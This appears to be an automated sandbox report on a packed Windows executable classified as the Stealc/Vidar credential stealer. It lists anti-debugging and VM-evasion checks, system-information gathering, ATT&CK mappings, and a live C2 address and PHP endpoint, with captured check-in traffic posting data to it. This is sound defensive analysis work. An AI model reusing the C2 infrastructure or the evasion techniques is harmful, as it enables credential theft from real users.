                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1442BE9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FB38B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FB4910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FADA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FAE430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FB4570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FAED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FA16D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FAF6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FB3EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FABE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FADE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA1160 GetSystemInfo,ExitProcess,0_2_00FA1160
                Source: file.exe, file.exe, 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareF
                Source: file.exe, 00000000.00000002.1746507563.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746507563.0000000000933000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13731
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13734
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13750
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13785
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13746
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FA45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_00FA45C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FB9860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB9750 mov eax, dword ptr fs:[00000030h] 0_2_00FB9750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00FB78E0
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match File source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00FB9600
                Source: file.exe, file.exe, 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00FB7B90
                Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00FB7980
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00FB7850
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00FB7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00FB7A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1706081897.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1706081897.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7048, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/?2 | file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php)2 | file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php3/ | file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37LjG30S | file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.phpw/ | file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpf | file.exe, 00000000.00000002.1746507563.0000000000933000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php$ | file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpa-7368302a1ad4 | file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpu2 | file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1529173
                                  Start date and time:2024-10-08 17:31:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 2s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 81%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 89
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated
                                  • VT rate limit hit for: file.exe
                                  No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                                  No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.945648026711068
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'885'184 bytes
                                  MD5:1666bdf952c77a910f9c69f491d5cc4b
                                  SHA1:e761daca0c544764e242bc6a2c17cbedc8c15c8c
                                  SHA256:4996064a6dc50f76d60d6aa783d5baafa7260930c0318f0762ba5c64f67ced64
                                  SHA512:bcc567d7b389dbcd486dc2503a50d87717b75d9bb3e492e72766890ff8a4afd35ad06e39dd927c440266bbbc33a8f7670f6bbdc2ad441fa6a726996c3218b103
                                  SSDEEP:49152:Cusg7gWxD4Blg2OqyjuAZPPoijrNarcQuo0SsEUml+3S:CuBEWmW2O9uWoqRIcHEo
                                  TLSH:DC9533E12D53C230D607F07E826B5FE75B69B0D3DD64D8E46F5A33381A6508AFB181A8
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                                  Icon Hash:90cececece8e8eb0
                                  Entrypoint:0xab1000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007FFAE8AEEF3Ah
                                  cpuid
                                  sbb al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007FFAE8AF0F35h
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax+00000000h], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 0Ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  mov cl, 80h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  and al, 00h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [eax+00000000h], eax
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop es
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], dh
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ecx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ecx], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
| 0x1000 | 0x25b000 | 0x22800 | 97b3c5a2f7f6c171ad17716d6a54532f | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
| 0x25e000 | 0x2ac000 | 0x200 | 6ac11bcfb8423bfd68bad63b241153b8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pvatzxoj | 0x50a000 | 0x1a6000 | 0x1a6000 | 00144b35d7da4cdca1cdb83666f3e42b | False | 0.9949661905731635 | data | 7.953433050296438 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ilwoqlxb | 0x6b0000 | 0x1000 | 0x600 | ee88d4ab4addb47d02546b42170ed8ef | False | 0.5768229166666666 | data | 4.958836571705963 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6b1000 | 0x3000 | 0x2200 | 152fd7db8d2238210ea8bc57d4e5c232 | False | 0.06950827205882353 | DOS executable (COM) | 0.7558700266923736 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-08T17:32:02.906806+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 17:32:01.910640955 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 17:32:01.915544033 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 17:32:01.915638924 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 17:32:01.915771961 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 17:32:01.920640945 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 17:32:02.631208897 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 17:32:02.631294966 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 17:32:02.633812904 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 17:32:02.638837099 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 17:32:02.906737089 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 8, 2024 17:32:02.906805992 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 8, 2024 17:32:06.863954067 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                                  • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 7048 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 17:32:01.915771961 CEST | 89 | OUT | GET / HTTP/1.1
                                  Host: 185.215.113.37
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
Oct 8, 2024 17:32:02.631208897 CEST | 203 | IN | HTTP/1.1 200 OK
                                  Date: Tue, 08 Oct 2024 15:32:02 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
Oct 8, 2024 17:32:02.633812904 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAA
                                  Host: 185.215.113.37
                                  Content-Length: 211
